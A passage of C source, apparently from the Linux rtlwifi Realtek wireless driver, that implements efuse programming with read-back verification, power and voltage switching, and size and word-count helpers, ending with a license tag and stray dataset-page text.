				continual = false;
			} else {
				/* Re-queue the words that failed verify
				 * as a fresh packet further along. */
				efuse_addr += (2 * target_word_cnts) + 1;
				target_pkt.offset = offset;
				target_pkt.word_en = badworden;
				target_word_cnts =
				    efuse_calculate_word_cnts(target_pkt.word_en);
				write_state = PG_STATE_HEADER;
				repeat_times++;
				if (repeat_times > EFUSE_REPEAT_THRESHOLD_) {
					continual = false;
					result = false;
				}
				RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
					"efuse PG_STATE_HEADER-3\n");
			}
		}
	}

	if (efuse_addr >= (EFUSE_MAX_SIZE - EFUSE_OOB_PROTECT_BYTES)) {
		RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD,
			 "efuse_addr(%#x) Out of size!!\n", efuse_addr);
	}

	return result;
}
/* Copy each 2-byte word whose enable bit is CLEAR in @word_en (clear ==
 * enabled) from @sourdata into the same position in @targetdata. */
static void efuse_word_enable_data_read(u8 word_en,
					u8 *sourdata, u8 *targetdata)
{
	int word;

	for (word = 0; word < 4; word++) {
		if (word_en & BIT(word))
			continue;

		targetdata[word * 2] = sourdata[word * 2];
		targetdata[word * 2 + 1] = sourdata[word * 2 + 1];
	}
}
/*
 * Program the words of @data enabled (bit clear) in @word_en starting
 * at @efuse_addr, reading each byte back to verify.  Returns a mask in
 * which the bit of every word that failed verification is cleared
 * (0x0F == everything verified).
 */
static u8 efuse_word_enable_data_write(struct ieee80211_hw *hw,
				       u16 efuse_addr, u8 word_en, u8 *data)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	u16 start_addr = efuse_addr;
	u8 badworden = 0x0F;
	u8 tmpdata[8];
	int word;

	memset(tmpdata, 0xff, PGPKT_DATA_SIZE);
	RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "word_en = %x efuse_addr=%x\n",
		 word_en, efuse_addr);

	/* Only enabled words consume efuse bytes, so start_addr advances
	 * two bytes per programmed word and skips disabled ones. */
	for (word = 0; word < 4; word++) {
		u16 tmpaddr;
		int lo = word * 2;

		if (word_en & BIT(word))
			continue;

		tmpaddr = start_addr;
		efuse_one_byte_write(hw, start_addr++, data[lo]);
		efuse_one_byte_write(hw, start_addr++, data[lo + 1]);

		efuse_one_byte_read(hw, tmpaddr, &tmpdata[lo]);
		efuse_one_byte_read(hw, tmpaddr + 1, &tmpdata[lo + 1]);
		if ((data[lo] != tmpdata[lo]) ||
		    (data[lo + 1] != tmpdata[lo + 1]))
			badworden &= (~BIT(word));
	}

	return badworden;
}
/*
 * Power the efuse block up (@pwrstate true) or down (false); @write
 * selects the additional programming-voltage setup needed for writes.
 * Register sequences differ for the RTL8192SE, which uses the EFUSE_CLK
 * register instead of the isolation/clock-gate path.
 */
static void efuse_power_switch(struct ieee80211_hw *hw, u8 write, u8 pwrstate)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
	u8 tempval;
	u16 tmpV16;

	if (pwrstate && (rtlhal->hw_type !=
		HARDWARE_TYPE_RTL8192SE)) {
		/* Enable the efuse 1.2V power cell if not already on. */
		tmpV16 = rtl_read_word(rtlpriv,
				       rtlpriv->cfg->maps[SYS_ISO_CTRL]);
		if (!(tmpV16 & rtlpriv->cfg->maps[EFUSE_PWC_EV12V])) {
			tmpV16 |= rtlpriv->cfg->maps[EFUSE_PWC_EV12V];
			rtl_write_word(rtlpriv,
				       rtlpriv->cfg->maps[SYS_ISO_CTRL],
				       tmpV16);
		}

		/* Enable the eFuse loader (ELDR) function block. */
		tmpV16 = rtl_read_word(rtlpriv,
				       rtlpriv->cfg->maps[SYS_FUNC_EN]);
		if (!(tmpV16 & rtlpriv->cfg->maps[EFUSE_FEN_ELDR])) {
			tmpV16 |= rtlpriv->cfg->maps[EFUSE_FEN_ELDR];
			rtl_write_word(rtlpriv,
				       rtlpriv->cfg->maps[SYS_FUNC_EN], tmpV16);
		}

		/* Enable the loader clock and the 8M analog clock. */
		tmpV16 = rtl_read_word(rtlpriv, rtlpriv->cfg->maps[SYS_CLK]);
		if ((!(tmpV16 & rtlpriv->cfg->maps[EFUSE_LOADER_CLK_EN])) ||
		    (!(tmpV16 & rtlpriv->cfg->maps[EFUSE_ANA8M]))) {
			tmpV16 |= (rtlpriv->cfg->maps[EFUSE_LOADER_CLK_EN] |
				   rtlpriv->cfg->maps[EFUSE_ANA8M]);
			rtl_write_word(rtlpriv,
				       rtlpriv->cfg->maps[SYS_CLK], tmpV16);
		}
	}

	if (pwrstate) {
		if (write) {
			/* Raise the programming voltage (bit 7 enables it;
			 * non-92SE parts also select VOLTAGE_V25). */
			tempval = rtl_read_byte(rtlpriv,
						rtlpriv->cfg->maps[EFUSE_TEST] +
						3);
			if (rtlhal->hw_type != HARDWARE_TYPE_RTL8192SE) {
				tempval &= 0x0F;
				tempval |= (VOLTAGE_V25 << 4);
			}
			rtl_write_byte(rtlpriv,
				       rtlpriv->cfg->maps[EFUSE_TEST] + 3,
				       (tempval | 0x80));
		}

		if (rtlhal->hw_type == HARDWARE_TYPE_RTL8192SE) {
			rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CLK],
				       0x03);
		}
	} else {
		if (write) {
			/* Drop the programming-voltage enable bit. */
			tempval = rtl_read_byte(rtlpriv,
						rtlpriv->cfg->maps[EFUSE_TEST] +
						3);
			rtl_write_byte(rtlpriv,
				       rtlpriv->cfg->maps[EFUSE_TEST] + 3,
				       (tempval & 0x7F));
		}

		if (rtlhal->hw_type == HARDWARE_TYPE_RTL8192SE) {
			rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CLK],
				       0x02);
		}
	}
}
/* Walk the PG packet headers from address 0 and return the first
 * unused efuse address (0xFF header or read failure stops the walk),
 * i.e. the number of raw efuse bytes consumed so far. */
static u16 efuse_get_current_size(struct ieee80211_hw *hw)
{
	u16 addr = 0;
	u8 header;

	while (efuse_one_byte_read(hw, addr, &header) &&
	       (addr < EFUSE_MAX_SIZE)) {
		u8 word_cnts;

		if (header == 0xFF)
			break;

		/* Skip this packet: 1 header byte + 2 bytes per word. */
		word_cnts = efuse_calculate_word_cnts(header & 0x0F);
		addr = addr + (word_cnts * 2) + 1;
	}

	return addr;
}
/* Count the words enabled by @word_en (a CLEAR bit enables a word). */
static u8 efuse_calculate_word_cnts(u8 word_en)
{
	u8 word_cnts = 0;
	int bit;

	for (bit = 0; bit < 4; bit++)
		if (!(word_en & BIT(bit)))
			word_cnts++;

	return word_cnts;
}
| gpl-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.